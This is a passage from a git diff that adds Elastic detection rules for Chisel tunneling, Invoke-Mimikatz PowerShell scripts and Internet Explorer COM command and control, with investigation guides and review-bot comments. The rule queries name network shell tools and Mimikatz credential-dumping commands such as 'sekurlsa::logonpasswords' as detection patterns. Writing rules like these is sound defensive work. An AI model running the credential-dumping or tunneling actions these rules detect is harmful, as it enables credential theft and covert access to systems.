"https://attack.mitre.org/techniques/T1546/", + "subtechnique": [ + { + "id": "T1546.012", + "name": "Image File Execution Options Injection", + "reference": "https://attack.mitre.org/techniques/T1546/012/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 112 + }, + "id": "ac5012b8-8da8-440b-aaaf-aedafdea2dff_112", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/ac8805f6-1e08-406c-962e-3937057fa86f_5.json b/packages/security_detection_engine/kibana/security_rule/ac8805f6-1e08-406c-962e-3937057fa86f_5.json new file mode 100644 index 00000000000..db941bc0f27 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/ac8805f6-1e08-406c-962e-3937057fa86f_5.json 
@@ -0,0 +1,111 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "This rule monitors for common command line flags leveraged by the Chisel server utility followed by a received connection within a timespan of 1 minute. Chisel is a command-line utility used for creating and managing TCP and UDP tunnels, enabling port forwarding and secure communication between machines. Attackers can abuse the Chisel utility to establish covert communication channels, bypass network restrictions, and carry out malicious activities by creating tunnels that allow unauthorized access to internal systems.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Potential Protocol Tunneling via Chisel Server", + "note": "## Triage and analysis\n\n### Investigating Potential Protocol Tunneling via Chisel Server\n\nAttackers can leverage `chisel` to clandestinely tunnel network communications and evade security measures, potentially gaining unauthorized access to sensitive systems.\n\nThis rule looks for a sequence of command line arguments that are consistent with `chisel` server tunneling behavior, followed by a network event by an uncommon process. \n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n> This investigation guide uses [placeholder fields](https://www.elastic.co/guide/en/security/current/osquery-placeholder-fields.html) to dynamically pass alert data into Osquery queries. Placeholder fields were introduced in Elastic Stack version 8.7.0. 
If you're using Elastic Stack version 8.6.0 or earlier, you'll need to manually adjust this investigation guide's queries to ensure they properly run.\n\n#### Possible investigation steps\n\n- Identify any signs of suspicious network activity or anomalies that may indicate protocol tunneling. This could include unexpected traffic patterns or unusual network behavior.\n - Investigate listening ports and open sockets to look for potential protocol tunneling, reverse shells, or data exfiltration.\n - !{osquery{\"label\":\"Osquery - Retrieve Listening Ports\",\"query\":\"SELECT pid, address, port, socket, protocol, path FROM listening_ports\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Open Sockets\",\"query\":\"SELECT pid, family, remote_address, remote_port, socket, state FROM process_open_sockets\"}}\n- Identify the user account that performed the action, analyze it, and check whether it should perform this kind of action.\n - !{osquery{\"label\":\"Osquery - Retrieve Information for a Specific User\",\"query\":\"SELECT * FROM users WHERE username = {{user.name}}\"}}\n- Investigate whether the user is currently logged in and active.\n - !{osquery{\"label\":\"Osquery - Investigate the Account Authentication Status\",\"query\":\"SELECT * FROM logged_in_users WHERE user = {{user.name}}\"}}\n- Investigate the script execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence and whether they are located in expected locations.\n - !{osquery{\"label\":\"Osquery - Retrieve Running Processes by User\",\"query\":\"SELECT pid, username, name FROM processes p JOIN users u ON u.uid = p.uid ORDER BY username\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Process Info\",\"query\":\"SELECT name, cmdline, parent, path, uid FROM processes\"}}\n- Investigate other alerts associated with the user/host during the past 48 hours.\n - If scripts or executables were dropped, retrieve the files and determine if they are malicious:\n - Use a private sandboxed malware analysis system to perform analysis.\n - Observe and collect information about the following activities:\n - Attempts to contact external domains and addresses.\n - Check if the domain is newly registered or unexpected.\n - Check the reputation of the domain or IP address.\n - File access, modification, and creation activities.\n\n### Related rules\n\n- Potential Protocol Tunneling via Chisel Client - 3f12325a-4cc6-410b-8d4c-9fbbeb744cfd\n- Potential Linux Tunneling and/or Port Forwarding - 6ee947e9-de7e-4281-a55d-09289bdf947e\n- Potential Protocol Tunneling via EarthWorm - 9f1c4ca3-44b5-481d-ba42-32dc215a2769\n\n### False positive analysis\n\n- If this activity is related to new benign software installation activity, consider adding exceptions \u2014 preferably with a combination of user and command line conditions.\n- If this activity is related to a system administrator or developer who uses port tunneling for benign purposes, consider adding exceptions for specific user accounts or hosts. \n- Try to understand the context of the execution by thinking about the user, machine, or business purpose. 
A small number of endpoints, such as servers with unique software, might appear unusual but satisfy a specific business need.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors, such as reverse shells, reverse proxies, or droppers, that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Leverage the incident response data and logging to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "sequence by host.id, process.entity_id with maxspan=1m\n [process where host.os.type == \"linux\" and event.action == \"exec\" and event.type == \"start\" and \n process.args == \"server\" and process.args in (\"--port\", \"-p\", \"--reverse\", \"--backend\", \"--socks5\") and \n process.args_count >= 3 and process.parent.name in (\"bash\", \"dash\", \"ash\", \"sh\", \"tcsh\", \"csh\", \"zsh\", \"ksh\", \"fish\")]\n [network where host.os.type == \"linux\" and event.action == \"connection_accepted\" and event.type == \"start\" and \n destination.ip != null and destination.ip != \"127.0.0.1\" and destination.ip != \"::1\" and \n not process.name : (\n \"python*\", \"php*\", \"perl\", \"ruby\", \"lua*\", \"openssl\", \"nc\", \"netcat\", \"ncat\", \"telnet\", \"awk\", \"java\", \"telnet\",\n \"ftp\", \"socat\", \"curl\", \"wget\", \"dpkg\", \"docker\", \"dockerd\", \"yum\", \"apt\", \"rpm\", \"dnf\", \"ssh\", \"sshd\", \"hugo\")]\n", + "references": [ + "https://blog.bitsadmin.com/living-off-the-foreign-land-windows-as-offensive-platform", + "https://book.hacktricks.xyz/generic-methodologies-and-resources/tunneling-and-port-forwarding" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "destination.ip", + "type": "ip" + }, + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.id", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + 
"name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args_count", + "type": "long" + }, + { + "ecs": true, + "name": "process.entity_id", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "ac8805f6-1e08-406c-962e-3937057fa86f", + "setup": "This rule requires data coming in from Elastic Defend.\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a Linux System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, either \"Traditional Endpoints\" or \"Cloud Workloads\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest selecting \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". 
If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Command and Control", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0011", + "name": "Command and Control", + "reference": "https://attack.mitre.org/tactics/TA0011/" + }, + "technique": [ + { + "id": "T1572", + "name": "Protocol Tunneling", + "reference": "https://attack.mitre.org/techniques/T1572/" + } + ] + } + ], + "type": "eql", + "version": 5 + }, + "id": "ac8805f6-1e08-406c-962e-3937057fa86f_5", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/ac8805f6-1e08-406c-962e-3937057fa86f_6.json b/packages/security_detection_engine/kibana/security_rule/ac8805f6-1e08-406c-962e-3937057fa86f_6.json new file mode 100644 index 00000000000..9871c6c9155 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/ac8805f6-1e08-406c-962e-3937057fa86f_6.json 
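Review bot: The process-name exclusion list in the network step of `query` names `"telnet"` twice (`"nc", "netcat", "ncat", "telnet", "awk", "java", "telnet",`); the second occurrence should be dropped so the list reads as intended. The same duplicate is carried into the `_6` revision of this rule added in the next hunk. Separately, this rule ships a full `note` investigation guide but its `tags` lack the `"Resources: Investigation Guide"` tag that the Mimikatz rule (`ac96ceb8-…`) in this same change carries alongside its `note`; if that tag is the convention for rules with a guide, it looks to be missing here and in `_6`.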
@@ -0,0 +1,111 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "This rule monitors for common command line flags leveraged by the Chisel server utility followed by a received connection within a timespan of 1 minute. Chisel is a command-line utility used for creating and managing TCP and UDP tunnels, enabling port forwarding and secure communication between machines. Attackers can abuse the Chisel utility to establish covert communication channels, bypass network restrictions, and carry out malicious activities by creating tunnels that allow unauthorized access to internal systems.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Potential Protocol Tunneling via Chisel Server", + "note": "## Triage and analysis\n\n### Investigating Potential Protocol Tunneling via Chisel Server\n\nAttackers can leverage `chisel` to clandestinely tunnel network communications and evade security measures, potentially gaining unauthorized access to sensitive systems.\n\nThis rule looks for a sequence of command line arguments that are consistent with `chisel` server tunneling behavior, followed by a network event by an uncommon process. \n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n> This investigation guide uses [placeholder fields](https://www.elastic.co/guide/en/security/current/osquery-placeholder-fields.html) to dynamically pass alert data into Osquery queries. Placeholder fields were introduced in Elastic Stack version 8.7.0. 
If you're using Elastic Stack version 8.6.0 or earlier, you'll need to manually adjust this investigation guide's queries to ensure they properly run.\n\n#### Possible investigation steps\n\n- Identify any signs of suspicious network activity or anomalies that may indicate protocol tunneling. This could include unexpected traffic patterns or unusual network behavior.\n - Investigate listening ports and open sockets to look for potential protocol tunneling, reverse shells, or data exfiltration.\n - !{osquery{\"label\":\"Osquery - Retrieve Listening Ports\",\"query\":\"SELECT pid, address, port, socket, protocol, path FROM listening_ports\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Open Sockets\",\"query\":\"SELECT pid, family, remote_address, remote_port, socket, state FROM process_open_sockets\"}}\n- Identify the user account that performed the action, analyze it, and check whether it should perform this kind of action.\n - !{osquery{\"label\":\"Osquery - Retrieve Information for a Specific User\",\"query\":\"SELECT * FROM users WHERE username = {{user.name}}\"}}\n- Investigate whether the user is currently logged in and active.\n - !{osquery{\"label\":\"Osquery - Investigate the Account Authentication Status\",\"query\":\"SELECT * FROM logged_in_users WHERE user = {{user.name}}\"}}\n- Investigate the script execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence and whether they are located in expected locations.\n - !{osquery{\"label\":\"Osquery - Retrieve Running Processes by User\",\"query\":\"SELECT pid, username, name FROM processes p JOIN users u ON u.uid = p.uid ORDER BY username\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Process Info\",\"query\":\"SELECT name, cmdline, parent, path, uid FROM processes\"}}\n- Investigate other alerts associated with the user/host during the past 48 hours.\n - If scripts or executables were dropped, retrieve the files and determine if they are malicious:\n - Use a private sandboxed malware analysis system to perform analysis.\n - Observe and collect information about the following activities:\n - Attempts to contact external domains and addresses.\n - Check if the domain is newly registered or unexpected.\n - Check the reputation of the domain or IP address.\n - File access, modification, and creation activities.\n\n### Related rules\n\n- Potential Protocol Tunneling via Chisel Client - 3f12325a-4cc6-410b-8d4c-9fbbeb744cfd\n- Potential Linux Tunneling and/or Port Forwarding - 6ee947e9-de7e-4281-a55d-09289bdf947e\n- Potential Protocol Tunneling via EarthWorm - 9f1c4ca3-44b5-481d-ba42-32dc215a2769\n\n### False positive analysis\n\n- If this activity is related to new benign software installation activity, consider adding exceptions \u2014 preferably with a combination of user and command line conditions.\n- If this activity is related to a system administrator or developer who uses port tunneling for benign purposes, consider adding exceptions for specific user accounts or hosts. \n- Try to understand the context of the execution by thinking about the user, machine, or business purpose. 
A small number of endpoints, such as servers with unique software, might appear unusual but satisfy a specific business need.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors, such as reverse shells, reverse proxies, or droppers, that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Leverage the incident response data and logging to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "sequence by host.id, process.entity_id with maxspan=1m\n [process where host.os.type == \"linux\" and event.type == \"start\" and event.action == \"exec\" and \n process.args == \"server\" and process.args in (\"--port\", \"-p\", \"--reverse\", \"--backend\", \"--socks5\") and \n process.args_count >= 3 and process.parent.name in (\"bash\", \"dash\", \"ash\", \"sh\", \"tcsh\", \"csh\", \"zsh\", \"ksh\", \"fish\")]\n [network where host.os.type == \"linux\" and event.type == \"start\" and event.action == \"connection_accepted\" and \n destination.ip != null and destination.ip != \"127.0.0.1\" and destination.ip != \"::1\" and \n not process.name : (\n \"python*\", \"php*\", \"perl\", \"ruby\", \"lua*\", \"openssl\", \"nc\", \"netcat\", \"ncat\", \"telnet\", \"awk\", \"java\", \"telnet\",\n \"ftp\", \"socat\", \"curl\", \"wget\", \"dpkg\", \"docker\", \"dockerd\", \"yum\", \"apt\", \"rpm\", \"dnf\", \"ssh\", \"sshd\", \"hugo\")]\n", + "references": [ + "https://blog.bitsadmin.com/living-off-the-foreign-land-windows-as-offensive-platform", + "https://book.hacktricks.xyz/generic-methodologies-and-resources/tunneling-and-port-forwarding" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "destination.ip", + "type": "ip" + }, + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.id", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + 
"name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args_count", + "type": "long" + }, + { + "ecs": true, + "name": "process.entity_id", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "ac8805f6-1e08-406c-962e-3937057fa86f", + "setup": "## Setup\n\nThis rule requires data coming in from Elastic Defend.\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a Linux System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, either \"Traditional Endpoints\" or \"Cloud Workloads\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest selecting \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". 
If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Command and Control", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0011", + "name": "Command and Control", + "reference": "https://attack.mitre.org/tactics/TA0011/" + }, + "technique": [ + { + "id": "T1572", + "name": "Protocol Tunneling", + "reference": "https://attack.mitre.org/techniques/T1572/" + } + ] + } + ], + "type": "eql", + "version": 6 + }, + "id": "ac8805f6-1e08-406c-962e-3937057fa86f_6", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/ac96ceb8-4399-4191-af1d-4feeac1f1f46_108.json b/packages/security_detection_engine/kibana/security_rule/ac96ceb8-4399-4191-af1d-4feeac1f1f46_108.json new file mode 100644 index 00000000000..9150ebb15f9 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/ac96ceb8-4399-4191-af1d-4feeac1f1f46_108.json 
@@ -0,0 +1,87 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Mimikatz is a credential dumper capable of obtaining plaintext Windows account logins and passwords, along with many other features that make it useful for testing the security of networks. This rule detects Invoke-Mimikatz PowerShell script and alike.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-windows.powershell*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "Potential Invoke-Mimikatz PowerShell Script", + "note": "## Triage and analysis\n\n### Investigating Mimikatz PowerShell Activity\n\n[Mimikatz](https://github.com/gentilkiwi/mimikatz) is an open-source tool used to collect, decrypt, and/or use cached credentials. This tool is commonly abused by adversaries during the post-compromise stage where adversaries have gained an initial foothold on an endpoint and are looking to elevate privileges and seek out additional authentication objects such as tokens/hashes/credentials that can then be used to move laterally and pivot across a network.\n\nThis rule looks for PowerShell scripts that load mimikatz in memory, like Invoke-Mimikataz, which are used to dump credentials from the Local Security Authority Subsystem Service (LSASS). Any activity triggered from this rule should be treated with high priority as it typically represents an active adversary.\n\nMore information about Mimikatz components and how to detect/prevent them can be found on [ADSecurity](https://adsecurity.org/?page_id=1821).\n\n#### Possible investigation steps\n\n- Examine the script content that triggered the detection; look for suspicious DLL imports, collection or exfiltration capabilities, suspicious functions, encoded or compressed data, and other potentially malicious characteristics.\n- Investigate the script execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Examine file or network events from the involved PowerShell process for suspicious behavior.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n - Invoke-Mimitakz and alike scripts heavily use other capabilities covered by other detections described in the \"Related Rules\" section.\n- Evaluate whether the user needs to use PowerShell to complete tasks.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host.\n - Examine network and security events in the environment to identify potential lateral movement using compromised credentials.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Related rules\n\n- PowerShell PSReflect Script - 56f2e9b5-4803-4e44-a0a4-a52dc79d57fe\n- Suspicious .NET Reflection via PowerShell - e26f042e-c590-4e82-8e05-41e81bd822ad\n- PowerShell Suspicious Payload Encoded and Compressed - 81fe9dc6-a2d7-4192-a2d8-eed98afc766a\n- Potential Process Injection via PowerShell - 2e29e96a-b67c-455a-afe4-de6183431d0d\n- Mimikatz Memssp Log File Detected - ebb200e8-adf0-43f8-a0bb-4ee5b5d852c6\n- Modification of WDigest Security Provider - d703a5af-d5b0-43bd-8ddb-7a5d500b7da5\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. 
Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Restrict PowerShell usage outside of IT and engineering business units using GPOs, AppLocker, Intune, or similar software.\n- Validate that cleartext passwords are disabled in memory for use with `WDigest`.\n- Look into preventing access to `LSASS` using capabilities such as LSA protection or antivirus/EDR tools that provide this capability.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "event.category:process and host.os.type:windows and\npowershell.file.script_block_text:(\n (DumpCreds and\n DumpCerts) or\n \"sekurlsa::logonpasswords\" or\n (\"crypto::certificates\" and\n \"CERT_SYSTEM_STORE_LOCAL_MACHINE\")\n)\n", + "references": [ + "https://attack.mitre.org/software/S0002/", + "https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Mimikatz.ps1", + "https://www.elastic.co/security-labs/detect-credential-access" + ], + "related_integrations": [ + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": false, + "name": "powershell.file.script_block_text", + "type": "unknown" + } + ], + "risk_score": 73, + "rule_id": "ac96ceb8-4399-4191-af1d-4feeac1f1f46", + "setup": "## Setup\n\nThe 'PowerShell Script Block Logging' logging policy must be configured (Enable).\n\nSteps to implement the logging policy with Advanced Audit 
Configuration:\n\n```\nComputer Configuration >\nAdministrative Templates >\nWindows PowerShell >\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```\n", + "severity": "high", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Credential Access", + "Resources: Investigation Guide", + "Data Source: PowerShell Logs" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0006", + "name": "Credential Access", + "reference": "https://attack.mitre.org/tactics/TA0006/" + }, + "technique": [ + { + "id": "T1003", + "name": "OS Credential Dumping", + "reference": "https://attack.mitre.org/techniques/T1003/", + "subtechnique": [ + { + "id": "T1003.001", + "name": "LSASS Memory", + "reference": "https://attack.mitre.org/techniques/T1003/001/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "query", + "version": 108 + }, + "id": "ac96ceb8-4399-4191-af1d-4feeac1f1f46_108", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/acd611f3-2b93-47b3-a0a3-7723bcc46f6d_105.json b/packages/security_detection_engine/kibana/security_rule/acd611f3-2b93-47b3-a0a3-7723bcc46f6d_105.json new file mode 100644 index 00000000000..64fd29575c7 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/acd611f3-2b93-47b3-a0a3-7723bcc46f6d_105.json 
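Review bot: The `note` field misspells the script name twice — `Invoke-Mimikataz` in the "Investigating" paragraph and `Invoke-Mimitakz` in the investigation steps — while `name` and `description` use `Invoke-Mimikatz`; both should read `Invoke-Mimikatz` so analysts searching the guide text find it. The `required_fields` entry for `powershell.file.script_block_text` declares `"type": "unknown"`; if the field's mapping is known from the `windows` integration, recording it here would make the schema check meaningful.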
@@ -0,0 +1,130 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies instances of Internet Explorer (iexplore.exe) being started via the Component Object Model (COM) making unusual network connections. Adversaries could abuse Internet Explorer via COM to avoid suspicious processes making network connections and bypass host-based firewall restrictions.", + "false_positives": [ + "Processes such as MS Office using IEproxy to render HTML content." + ], + "from": "now-9m", + "index": [ + "logs-endpoint.events.*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Potential Command and Control via Internet Explorer", + "query": "sequence by host.id, user.name with maxspan = 5s\n [library where host.os.type == \"windows\" and dll.name : \"IEProxy.dll\" and process.name : (\"rundll32.exe\", \"regsvr32.exe\")]\n [process where host.os.type == \"windows\" and event.type == \"start\" and process.parent.name : \"iexplore.exe\" and process.parent.args : \"-Embedding\"]\n /* IE started via COM in normal conditions makes few connections, mainly to Microsoft and OCSP related domains, add FPs here */\n [network where host.os.type == \"windows\" and network.protocol == \"dns\" and process.name : \"iexplore.exe\" and\n not dns.question.name :\n (\n \"*.microsoft.com\",\n \"*.digicert.com\",\n \"*.msocsp.com\",\n \"*.windowsupdate.com\",\n \"*.bing.com\",\n \"*.identrust.com\",\n \"*.sharepoint.com\",\n \"*.office365.com\",\n \"*.office.com\"\n )\n ] /* with runs=5 */\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "dll.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "dns.question.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.id", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": 
true, + "name": "network.protocol", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "user.name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "acd611f3-2b93-47b3-a0a3-7723bcc46f6d", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Command and Control", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0011", + "name": "Command and Control", + "reference": "https://attack.mitre.org/tactics/TA0011/" + }, + "technique": [ + { + "id": "T1071", + "name": "Application Layer Protocol", + "reference": "https://attack.mitre.org/techniques/T1071/" + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0002", + "name": "Execution", + "reference": "https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [ + { + "id": "T1559", + "name": "Inter-Process Communication", + "reference": "https://attack.mitre.org/techniques/T1559/", + "subtechnique": [ + { + "id": "T1559.001", + "name": "Component Object Model", + "reference": "https://attack.mitre.org/techniques/T1559/001/" + } + ] + } + ] + } + ], + "type": "eql", + "version": 105 + }, + "id": "acd611f3-2b93-47b3-a0a3-7723bcc46f6d_105", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/ace1e989-a541-44df-93a8-a8b0591b63c0_108.json b/packages/security_detection_engine/kibana/security_rule/ace1e989-a541-44df-93a8-a8b0591b63c0_108.json new file mode 100644 index 00000000000..d345cfb6e71 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/ace1e989-a541-44df-93a8-a8b0591b63c0_108.json 
